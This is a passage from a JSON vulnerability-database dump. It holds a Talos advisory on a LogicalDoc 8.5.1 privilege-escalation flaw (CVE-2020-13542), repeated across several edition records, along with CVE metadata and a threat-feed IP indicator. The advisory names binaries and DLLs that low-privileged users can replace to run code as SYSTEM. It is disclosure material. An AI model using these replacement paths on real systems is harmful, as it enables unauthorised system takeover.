"exploitabilityScore": 3.9, "impactScore": 3.6}, "cpe23": ["cpe:2.3:a:zibtoken:zibtoken:-:*:*:*:*:*:*:*"], "cwe": ["CWE-190"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:zibtoken:zibtoken:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://github.com/BlockChainsSecurity/EtherTokens/blob/master/GEMCHAIN/mint%20integer%20overflow.md", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://github.com/BlockChainsSecurity/EtherTokens/blob/master/GEMCHAIN/mint%20integer%20overflow.md"}, {"name": "https://github.com/BlockChainsSecurity/EtherTokens/tree/master/ZIBToken", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://github.com/BlockChainsSecurity/EtherTokens/tree/master/ZIBToken"}], "immutableFields": []}], "talos": [{"id": "TALOS-2020-1154", "bulletinFamily": "info", "title": "LogicalDoc installation privilege escalation vulnerability", "description": "# Talos Vulnerability Report\n\n### TALOS-2020-1154\n\n## LogicalDoc installation privilege escalation vulnerability\n\n##### November 10, 2020\n\n##### CVE Number\n\nCVE-2020-13542\n\n### Summary\n\nA local privilege elevation vulnerability exists in the file system permissions of LogicalDoc 8.5.1 installation. Depending on the vector chosen, an attacker can either replace the service binary or replace DLL files loaded by the service, both which get executed by a service thus executing arbitrary commands with System privileges.\n\n### Tested Versions\n\nLogicalDoc 8.5.1\n\n### Product URLs\n\n<https://www.logicaldoc.com/product/overview>\n\n### CVSSv3 Score\n\n9.3 - CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n\n### CWE\n\nCWE-276 - Incorrect Default Permissions\n\n### Details\n\nLogicalDoc Document Management System is a proprietary document management system designed to handle document storage and indexing using Lucene engine.\n\nBy default, LogicalDoc is installed in \u201cC:\\LogicalDOC\u201d directory and it allows \u201cAuthenticated Users\u201d group to have \u201cChange\u201d privilage over certain files in the directory which are executed with SYSTEM authority. This allows users in any authenticated group to read, write or modify arbitrary files in the install directory resulting in privilage escalation.\n\nThe base LogicalDoc directory has lax permissions, providing any auhenticated user with change permissions in the directory:\n \n \n C:\\LogicalDOC BUILTIN\\Administrators:(OI)(CI)(ID)F\n NT AUTHORITY\\SYSTEM:(OI)(CI)(ID)F\n BUILTIN\\Users:(OI)(CI)(ID)R\n NT AUTHORITY\\Authenticated Users:(ID)C\n NT AUTHORITY\\Authenticated Users:(OI)(CI)(IO)(ID)C\n \n\nThis allows for several possible attack scenarios:\n\nAny authenticated user on the system to replace binary located in default location as seen below to execute code with privilege of NT SYSTEM user:\n \n \n C:\\LogicalDOC\\tomcat\\bin\\LogicalDOC.exe BUILTIN\\Administrators:(ID)F\n NT AUTHORITY\\SYSTEM:(ID)F\n BUILTIN\\Users:(ID)R\n NT AUTHORITY\\Authenticated Users:(ID)C\n \n\nThey could also replace the update binary, again allowing code execution with NT SYSTEM level privileges:\n \n \n C:\\LogicalDOC\\update-wd\\update-wd.exe BUILTIN\\Administrators:(ID)F\n NT AUTHORITY\\SYSTEM:(ID)F\n BUILTIN\\Users:(ID)R\n NT AUTHORITY\\Authenticated Users:(ID)C\n \n\nAn attacker could also replace any of the DLLs loaded by these applications.\n\n### Timeline\n\n2020-09-16 - Vendor Disclosure \n \n2020-11-03 - Vendor released patch \n2020-11-10 - Public Release\n\n##### Credit\n\nDiscovered by Yuri Kramarz of Cisco Talos. \n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2020-1120\n\nPrevious Report\n\nTALOS-2020-1032\n", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1154", "reporter": "Talos Intelligence", "references": [], "cvelist": ["CVE-2020-13542"], "type": "talos", "lastseen": "2021-07-28T14:35:13", "history": [{"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2020-13542"], "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "description": "# Talos Vulnerability Report\n\n### TALOS-2020-1154\n\n## LogicalDoc installation privilege escalation vulnerability\n\n##### November 10, 2020\n\n##### CVE Number\n\nCVE-2020-13542\n\n### Summary\n\nA local privilege elevation vulnerability exists in the file system permissions of LogicalDoc 8.5.1 installation. Depending on the vector chosen, an attacker can either replace the service binary or replace DLL files loaded by the service, both which get executed by a service thus executing arbitrary commands with System privileges.\n\n### Tested Versions\n\nLogicalDoc 8.5.1\n\n### Product URLs\n\n<https://www.logicaldoc.com/product/overview>\n\n### CVSSv3 Score\n\n9.3 - CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n\n### CWE\n\nCWE-276 - Incorrect Default Permissions\n\n### Details\n\nLogicalDoc Document Management System is a proprietary document management system designed to handle document storage and indexing using Lucene engine.\n\nBy default, LogicalDoc is installed in \u201cC:\\LogicalDOC\u201d directory and it allows \u201cAuthenticated Users\u201d group to have \u201cChange\u201d privilage over certain files in the directory which are executed with SYSTEM authority. This allows users in any authenticated group to read, write or modify arbitrary files in the install directory resulting in privilage escalation.\n\nThe base LogicalDoc directory has lax permissions, providing any auhenticated user with change permissions in the directory:\n \n \n C:\\LogicalDOC BUILTIN\\Administrators:(OI)(CI)(ID)F\n NT AUTHORITY\\SYSTEM:(OI)(CI)(ID)F\n BUILTIN\\Users:(OI)(CI)(ID)R\n NT AUTHORITY\\Authenticated Users:(ID)C\n NT AUTHORITY\\Authenticated Users:(OI)(CI)(IO)(ID)C\n \n\nThis allows for several possible attack scenarios:\n\nAny authenticated user on the system to replace binary located in default location as seen below to execute code with privilege of NT SYSTEM user:\n \n \n C:\\LogicalDOC\\tomcat\\bin\\LogicalDOC.exe BUILTIN\\Administrators:(ID)F\n NT AUTHORITY\\SYSTEM:(ID)F\n BUILTIN\\Users:(ID)R\n NT AUTHORITY\\Authenticated Users:(ID)C\n \n\nThey could also replace the update binary, again allowing code execution with NT SYSTEM level privileges:\n \n \n C:\\LogicalDOC\\update-wd\\update-wd.exe BUILTIN\\Administrators:(ID)F\n NT AUTHORITY\\SYSTEM:(ID)F\n BUILTIN\\Users:(ID)R\n NT AUTHORITY\\Authenticated Users:(ID)C\n \n\nAn attacker could also replace any of the DLLs loaded by these applications.\n\n### Timeline\n\n2020-09-16 - Vendor Disclosure \n \n2020-11-03 - Vendor released patch \n2020-11-10 - Public Release\n\n##### Credit\n\nDiscovered by Yuri Kramarz of Cisco Talos. \n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2020-1120\n\nPrevious Report\n\nTALOS-2020-1141\n", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-12-08T13:25:15", "references": [{"idList": ["CVE-2020-13542"], "type": "cve"}], "rev": 2}, "score": {"modified": "2020-12-08T13:25:15", "rev": 2, "value": 6.5, "vector": "NONE"}}, "hash": "e9d162b00a768719b40d320caf56096f133e373ffb5f7b723634dcd250e6217f", "hashmap": [{"hash": "cea61fabeedbb74ac5048ca2691d72ca", "key": "description"}, {"hash": "fef7fa539358cb9e9166e70f7cdaf607", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e9d35651465a33152474c0e772461067", "key": "title"}, {"hash": "48f36bd046f09d8a3c5fa704ae9756f0", "key": "href"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "f2cee3fd74aadb43c91396f206bcf3e8", "key": "type"}, {"hash": "34956ac0a726126687502bf9088bc7bb", "key": "reporter"}, {"hash": "2cbde5a9a74bdbb66e46723b6aa74453", "key": "modified"}, {"hash": "2cbde5a9a74bdbb66e46723b6aa74453", "key": "published"}, {"hash": "f74481c4d3fb2a622ac8c8a438ded811", "key": "cvss"}], "history": [], "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1154", "id": "TALOS-2020-1154", "lastseen": "2020-12-08T13:25:15", "modified": "2020-11-10T00:00:00", "objectVersion": "1.3", "published": "2020-11-10T00:00:00", "references": [], "reporter": "Talos Intelligence", "title": "LogicalDoc installation privilege escalation vulnerability", "type": "talos", "viewCount": 0}, "differentElements": ["description"], "edition": 4, "lastseen": "2020-12-08T13:25:15"}, {"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2020-13542"], "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "# Talos Vulnerability Report\n\n### TALOS-2020-1154\n\n## LogicalDoc installation privilege escalation vulnerability\n\n##### November 10, 2020\n\n##### CVE Number\n\nCVE-2020-13542\n\n### Summary\n\nA local privilege elevation vulnerability exists in the file system permissions of LogicalDoc 8.5.1 installation. Depending on the vector chosen, an attacker can either replace the service binary or replace DLL files loaded by the service, both which get executed by a service thus executing arbitrary commands with System privileges.\n\n### Tested Versions\n\nLogicalDoc 8.5.1\n\n### Product URLs\n\n<https://www.logicaldoc.com/product/overview>\n\n### CVSSv3 Score\n\n9.3 - CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n\n### CWE\n\nCWE-276 - Incorrect Default Permissions\n\n### Details\n\nLogicalDoc Document Management System is a proprietary document management system designed to handle document storage and indexing using Lucene engine.\n\nBy default, LogicalDoc is installed in \u201cC:\\LogicalDOC\u201d directory and it allows \u201cAuthenticated Users\u201d group to have \u201cChange\u201d privilage over certain files in the directory which are executed with SYSTEM authority. This allows users in any authenticated group to read, write or modify arbitrary files in the install directory resulting in privilage escalation.\n\nThe base LogicalDoc directory has lax permissions, providing any auhenticated user with change permissions in the directory:\n \n \n C:\\LogicalDOC BUILTIN\\Administrators:(OI)(CI)(ID)F\n NT AUTHORITY\\SYSTEM:(OI)(CI)(ID)F\n BUILTIN\\Users:(OI)(CI)(ID)R\n NT AUTHORITY\\Authenticated Users:(ID)C\n NT AUTHORITY\\Authenticated Users:(OI)(CI)(IO)(ID)C\n \n\nThis allows for several possible attack scenarios:\n\nAny authenticated user on the system to replace binary located in default location as seen below to execute code with privilege of NT SYSTEM user:\n \n \n C:\\LogicalDOC\\tomcat\\bin\\LogicalDOC.exe BUILTIN\\Administrators:(ID)F\n NT AUTHORITY\\SYSTEM:(ID)F\n BUILTIN\\Users:(ID)R\n NT AUTHORITY\\Authenticated Users:(ID)C\n \n\nThey could also replace the update binary, again allowing code execution with NT SYSTEM level privileges:\n \n \n C:\\LogicalDOC\\update-wd\\update-wd.exe BUILTIN\\Administrators:(ID)F\n NT AUTHORITY\\SYSTEM:(ID)F\n BUILTIN\\Users:(ID)R\n NT AUTHORITY\\Authenticated Users:(ID)C\n \n\nAn attacker could also replace any of the DLLs loaded by these applications.\n\n### Timeline\n\n2020-09-16 - Vendor Disclosure \n \n2020-11-03 - Vendor released patch \n2020-11-10 - Public Release\n\n##### Credit\n\nDiscovered by Yuri Kramarz of Cisco Talos. \n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2020-1120\n\nPrevious Report\n\nTALOS-2020-1032\n", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-12-18T23:22:14", "references": [{"idList": ["CVE-2020-13542"], "type": "cve"}], "rev": 2}, "score": {"modified": "2020-12-18T23:22:14", "rev": 2, "value": 6.5, "vector": "NONE"}}, "hash": "6d3751e0827601ea3f79bbd25df9a7442bdc198187032df1d2ee1a22a388cd05", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "8b334521d73a7b0194932aab3cf4dae1", "key": "description"}, {"hash": "fef7fa539358cb9e9166e70f7cdaf607", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e9d35651465a33152474c0e772461067", "key": "title"}, {"hash": "48f36bd046f09d8a3c5fa704ae9756f0", "key": "href"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "f2cee3fd74aadb43c91396f206bcf3e8", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "34956ac0a726126687502bf9088bc7bb", "key": "reporter"}, {"hash": "2cbde5a9a74bdbb66e46723b6aa74453", "key": "modified"}, {"hash": "2cbde5a9a74bdbb66e46723b6aa74453", "key": "published"}, {"hash": "f74481c4d3fb2a622ac8c8a438ded811", "key": "cvss"}], "history": [], "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1154", "id": "TALOS-2020-1154", "immutableFields": [], "lastseen": "2020-12-18T23:22:14", "modified": "2020-11-10T00:00:00", "objectVersion": "1.5", "published": "2020-11-10T00:00:00", "references": [], "reporter": "Talos Intelligence", "title": "LogicalDoc installation privilege escalation vulnerability", "type": "talos", "viewCount": 1}, "different_elements": ["cvss3", "cvss2"], "edition": 5, "lastseen": "2020-12-18T23:22:14"}, {"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2020-13542"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "# Talos Vulnerability Report\n\n### TALOS-2020-1154\n\n## LogicalDoc installation privilege escalation vulnerability\n\n##### November 10, 2020\n\n##### CVE Number\n\nCVE-2020-13542\n\n### Summary\n\nA local privilege elevation vulnerability exists in the file system permissions of LogicalDoc 8.5.1 installation. Depending on the vector chosen, an attacker can either replace the service binary or replace DLL files loaded by the service, both which get executed by a service thus executing arbitrary commands with System privileges.\n\n### Tested Versions\n\nLogicalDoc 8.5.1\n\n### Product URLs\n\n<https://www.logicaldoc.com/product/overview>\n\n### CVSSv3 Score\n\n9.3 - CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n\n### CWE\n\nCWE-276 - Incorrect Default Permissions\n\n### Details\n\nLogicalDoc Document Management System is a proprietary document management system designed to handle document storage and indexing using Lucene engine.\n\nBy default, LogicalDoc is installed in \u201cC:\\LogicalDOC\u201d directory and it allows \u201cAuthenticated Users\u201d group to have \u201cChange\u201d privilage over certain files in the directory which are executed with SYSTEM authority. This allows users in any authenticated group to read, write or modify arbitrary files in the install directory resulting in privilage escalation.\n\nThe base LogicalDoc directory has lax permissions, providing any auhenticated user with change permissions in the directory:\n \n \n C:\\LogicalDOC BUILTIN\\Administrators:(OI)(CI)(ID)F\n NT AUTHORITY\\SYSTEM:(OI)(CI)(ID)F\n BUILTIN\\Users:(OI)(CI)(ID)R\n NT AUTHORITY\\Authenticated Users:(ID)C\n NT AUTHORITY\\Authenticated Users:(OI)(CI)(IO)(ID)C\n \n\nThis allows for several possible attack scenarios:\n\nAny authenticated user on the system to replace binary located in default location as seen below to execute code with privilege of NT SYSTEM user:\n \n \n C:\\LogicalDOC\\tomcat\\bin\\LogicalDOC.exe BUILTIN\\Administrators:(ID)F\n NT AUTHORITY\\SYSTEM:(ID)F\n BUILTIN\\Users:(ID)R\n NT AUTHORITY\\Authenticated Users:(ID)C\n \n\nThey could also replace the update binary, again allowing code execution with NT SYSTEM level privileges:\n \n \n C:\\LogicalDOC\\update-wd\\update-wd.exe BUILTIN\\Administrators:(ID)F\n NT AUTHORITY\\SYSTEM:(ID)F\n BUILTIN\\Users:(ID)R\n NT AUTHORITY\\Authenticated Users:(ID)C\n \n\nAn attacker could also replace any of the DLLs loaded by these applications.\n\n### Timeline\n\n2020-09-16 - Vendor Disclosure \n \n2020-11-03 - Vendor released patch \n2020-11-10 - Public Release\n\n##### Credit\n\nDiscovered by Yuri Kramarz of Cisco Talos. \n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2020-1120\n\nPrevious Report\n\nTALOS-2020-1141\n", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-11-12T23:30:15", "references": [{"idList": ["CVE-2020-13542"], "type": "cve"}], "rev": 2}, "score": {"modified": "2020-11-12T23:30:15", "rev": 2, "value": 6.5, "vector": "NONE"}}, "hash": "f5adadb3b0bb7465b95e7975533a8084adf221ffeee59b09efb654292f89b4d4", "hashmap": [{"hash": "cea61fabeedbb74ac5048ca2691d72ca", "key": "description"}, {"hash": "fef7fa539358cb9e9166e70f7cdaf607", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e9d35651465a33152474c0e772461067", "key": "title"}, {"hash": "48f36bd046f09d8a3c5fa704ae9756f0", "key": "href"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "f2cee3fd74aadb43c91396f206bcf3e8", "key": "type"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "34956ac0a726126687502bf9088bc7bb", "key": "reporter"}, {"hash": "2cbde5a9a74bdbb66e46723b6aa74453", "key": "modified"}, {"hash": "2cbde5a9a74bdbb66e46723b6aa74453", "key": "published"}], "history": [], "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1154", "id": "TALOS-2020-1154", "lastseen": "2020-11-12T23:30:15", "modified": "2020-11-10T00:00:00", "objectVersion": "1.3", "published": "2020-11-10T00:00:00", "references": [], "reporter": "Talos Intelligence", "title": "LogicalDoc installation privilege escalation vulnerability", "type": "talos", "viewCount": 0}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2020-11-12T23:30:15"}, {"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2020-13542"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "# Talos Vulnerability Report\n\n### TALOS-2020-1154\n\n## LogicalDoc installation privilege escalation vulnerability\n\n##### November 10, 2020\n\n##### CVE Number\n\nCVE-2020-13542\n\n### Summary\n\nA local privilege elevation vulnerability exists in the file system permissions of LogicalDoc 8.5.1 installation. Depending on the vector chosen, an attacker can either replace the service binary or replace DLL files loaded by the service, both which get executed by a service thus executing arbitrary commands with System privileges.\n\n### Tested Versions\n\nLogicalDoc 8.5.1\n\n### Product URLs\n\n<https://www.logicaldoc.com/product/overview>\n\n### CVSSv3 Score\n\n9.3 - CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n\n### CWE\n\nCWE-276 - Incorrect Default Permissions\n\n### Details\n\nLogicalDoc Document Management System is a proprietary document management system designed to handle document storage and indexing using Lucene engine.\n\nBy default, LogicalDoc is installed in \u201cC:\\LogicalDOC\u201d directory and it allows \u201cAuthenticated Users\u201d group to have \u201cChange\u201d privilage over certain files in the directory which are executed with SYSTEM authority. This allows users in any authenticated group to read, write or modify arbitrary files in the install directory resulting in privilage escalation.\n\nThe base LogicalDoc directory has lax permissions, providing any auhenticated user with change permissions in the directory:\n \n \n C:\\LogicalDOC BUILTIN\\Administrators:(OI)(CI)(ID)F\n NT AUTHORITY\\SYSTEM:(OI)(CI)(ID)F\n BUILTIN\\Users:(OI)(CI)(ID)R\n NT AUTHORITY\\Authenticated Users:(ID)C\n NT AUTHORITY\\Authenticated Users:(OI)(CI)(IO)(ID)C\n \n\nThis allows for several possible attack scenarios:\n\nAny authenticated user on the system to replace binary located in default location as seen below to execute code with privilege of NT SYSTEM user:\n \n \n C:\\LogicalDOC\\tomcat\\bin\\LogicalDOC.exe BUILTIN\\Administrators:(ID)F\n NT AUTHORITY\\SYSTEM:(ID)F\n BUILTIN\\Users:(ID)R\n NT AUTHORITY\\Authenticated Users:(ID)C\n \n\nThey could also replace the update binary, again allowing code execution with NT SYSTEM level privileges:\n \n \n C:\\LogicalDOC\\update-wd\\update-wd.exe BUILTIN\\Administrators:(ID)F\n NT AUTHORITY\\SYSTEM:(ID)F\n BUILTIN\\Users:(ID)R\n NT AUTHORITY\\Authenticated Users:(ID)C\n \n\nAn attacker could also replace any of the DLLs loaded by these applications.\n\n### Timeline\n\n2020-09-16 - Vendor Disclosure \n \n2020-11-03 - Vendor released patch \n2020-11-10 - Public Release\n\n##### Credit\n\nDiscovered by Yuri Kramarz of Cisco Talos. \n\n* * *\n\nVulnerability Reports Previous Report\n\nTALOS-2020-1141\n", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-11-11T03:21:10", "references": [], "rev": 2}, "score": {"modified": "2020-11-11T03:21:10", "rev": 2, "value": 1.9, "vector": "NONE"}}, "hash": "60572436ea41c70062f70b8259bb1b8850efcbb1700c1509d8d8e568fb2c8782", "hashmap": [{"hash": "fef7fa539358cb9e9166e70f7cdaf607", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e9d35651465a33152474c0e772461067", "key": "title"}, {"hash": "48f36bd046f09d8a3c5fa704ae9756f0", "key": "href"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "0041b46750eae5ce9a6e6aac6857eba8", "key": "description"}, {"hash": "f2cee3fd74aadb43c91396f206bcf3e8", "key": "type"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "34956ac0a726126687502bf9088bc7bb", "key": "reporter"}, {"hash": "2cbde5a9a74bdbb66e46723b6aa74453", "key": "modified"}, {"hash": "2cbde5a9a74bdbb66e46723b6aa74453", "key": "published"}], "history": [], "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1154", "id": "TALOS-2020-1154", "lastseen": "2020-11-11T03:21:10", "modified": "2020-11-10T00:00:00", "objectVersion": "1.3", "published": "2020-11-10T00:00:00", "references": [], "reporter": "Talos Intelligence", "title": "LogicalDoc installation privilege escalation vulnerability", "type": "talos", "viewCount": 0}, "differentElements": ["description"], "edition": 2, "lastseen": "2020-11-11T03:21:10"}, {"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2020-13542"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "# Talos Vulnerability Report\n\n### TALOS-2020-1154\n\n## LogicalDoc installation privilege escalation vulnerability\n\n##### November 10, 2020\n\n##### CVE Number\n\nCVE-2020-13542\n\n### Summary\n\nA local privilege elevation vulnerability exists in the file system permissions of LogicalDoc 8.5.1 installation. Depending on the vector chosen, an attacker can either replace the service binary or replace DLL files loaded by the service, both which get executed by a service thus executing arbitrary commands with System privileges.\n\n### Tested Versions\n\nLogicalDoc 8.5.1\n\n### Product URLs\n\n<https://www.logicaldoc.com/product/overview>\n\n### CVSSv3 Score\n\n9.3 - CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n\n### CWE\n\nCWE-276 - Incorrect Default Permissions\n\n### Details\n\nLogicalDoc Document Management System is a proprietary document management system designed to handle document storage and indexing using Lucene engine.\n\nBy default, LogicalDoc is installed in \u201cC:\\LogicalDOC\u201d directory and it allows \u201cAuthenticated Users\u201d group to have \u201cChange\u201d privilage over certain files in the directory which are executed with SYSTEM authority. This allows users in any authenticated group to read, write or modify arbitrary files in the install directory resulting in privilage escalation.\n\nThe base LogicalDoc directory has lax permissions, providing any auhenticated user with change permissions in the directory:\n \n \n C:\\LogicalDOC BUILTIN\\Administrators:(OI)(CI)(ID)F\n NT AUTHORITY\\SYSTEM:(OI)(CI)(ID)F\n BUILTIN\\Users:(OI)(CI)(ID)R\n NT AUTHORITY\\Authenticated Users:(ID)C\n NT AUTHORITY\\Authenticated Users:(OI)(CI)(IO)(ID)C\n \n\nThis allows for several possible attack scenarios:\n\nAny authenticated user on the system to replace binary located in default location as seen below to execute code with privilege of NT SYSTEM user:\n \n \n C:\\LogicalDOC\\tomcat\\bin\\LogicalDOC.exe BUILTIN\\Administrators:(ID)F\n NT AUTHORITY\\SYSTEM:(ID)F\n BUILTIN\\Users:(ID)R\n NT AUTHORITY\\Authenticated Users:(ID)C\n \n\nThey could also replace the update binary, again allowing code execution with NT SYSTEM level privileges:\n \n \n C:\\LogicalDOC\\update-wd\\update-wd.exe BUILTIN\\Administrators:(ID)F\n NT AUTHORITY\\SYSTEM:(ID)F\n BUILTIN\\Users:(ID)R\n NT AUTHORITY\\Authenticated Users:(ID)C\n \n\nAn attacker could also replace any of the DLLs loaded by these applications.\n\n### Timeline\n\n2020-09-16 - Vendor Disclosure \n \n2020-11-03 - Vendor released patch \n2020-11-10 - Public Release\n\n##### Credit\n\nDiscovered by Yuri Kramarz of Cisco Talos. \n\n* * *\n\nVulnerability Reports Previous Report\n\nTALOS-2020-1125\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2020-11-10T21:21:27", "references": [], "rev": 2}, "score": {"modified": "2020-11-10T21:21:27", "rev": 2, "value": 1.9, "vector": "NONE"}}, "hash": "0438837687dd674f7711036058b19136b3dab75770513ea9a02796fcfa6d479f", "hashmap": [{"hash": "fef7fa539358cb9e9166e70f7cdaf607", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e9d35651465a33152474c0e772461067", "key": "title"}, {"hash": "48f36bd046f09d8a3c5fa704ae9756f0", "key": "href"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "f2cee3fd74aadb43c91396f206bcf3e8", "key": "type"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "522dd121818555cf06b28de8a7922f75", "key": "description"}, {"hash": "34956ac0a726126687502bf9088bc7bb", "key": "reporter"}, {"hash": "2cbde5a9a74bdbb66e46723b6aa74453", "key": "modified"}, {"hash": "2cbde5a9a74bdbb66e46723b6aa74453", "key": "published"}], "history": [], "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1154", "id": "TALOS-2020-1154", "lastseen": "2020-11-10T21:21:27", "modified": "2020-11-10T00:00:00", "objectVersion": "1.3", "published": "2020-11-10T00:00:00", "references": [], "reporter": "Talos Intelligence", "title": "LogicalDoc installation privilege escalation vulnerability", "type": "talos", "viewCount": 0}, "differentElements": ["description"], "edition": 1, "lastseen": "2020-11-10T21:21:27"}], "edition": 6, "hashmap": [{"key": "bulletinFamily", "hash": "caf9b6b99962bf5c2264824231d7a40c"}, {"key": "cvelist", "hash": "fef7fa539358cb9e9166e70f7cdaf607"}, {"key": "cvss", "hash": "f74481c4d3fb2a622ac8c8a438ded811"}, {"key": "cvss2", "hash": "912963c5a5069f33e89eaadd15a45a54"}, {"key": "cvss3", "hash": "beb519effad5780952ea4ce1697a49ad"}, {"key": "description", "hash": "8b334521d73a7b0194932aab3cf4dae1"}, {"key": "href", "hash": "48f36bd046f09d8a3c5fa704ae9756f0"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "2cbde5a9a74bdbb66e46723b6aa74453"}, {"key": "published", "hash": "2cbde5a9a74bdbb66e46723b6aa74453"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "34956ac0a726126687502bf9088bc7bb"}, {"key": "title", "hash": "e9d35651465a33152474c0e772461067"}, {"key": "type", "hash": "f2cee3fd74aadb43c91396f206bcf3e8"}], "hash": "25ad8c9dae3630868470489bd117b2593d80b72e760b09a6c74fc0adb774c926", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-13542"]}], "modified": "2021-07-28T14:35:13", "rev": 2}, "score": {"value": 6.5, "vector": "NONE", "modified": "2021-07-28T14:35:13", "rev": 2}}, "objectVersion": "1.6", "scheme": null, "immutableFields": [], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}}], "rst": [{"id": "RST:7F333D52-B6CE-3A0E-A7D0-720705F18F37", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 162.210.173.6", "description": "Found **162[.]210.173.6** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **20**.\n First seen: 2020-06-24T03:00:00, Last seen: 2020-08-19T03:00:00.\n IOC tags: **generic**.\nASN 46841: (First IP 162.210.172.0, Last IP 162.210.173.255).\nASN Name \"FORKNETWORKING\" and Organisation \"Fork Networking LLC\".\nASN hosts 13542 domains.\nGEO IP information: City \"\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2020-09-21T00:00:00", "modified": "2020-06-24T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2020-08-19T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "219b114910626efab6d8bf4ab1233e82"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "fa51eae1e8169a551ac69c5e5eae87d4"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, 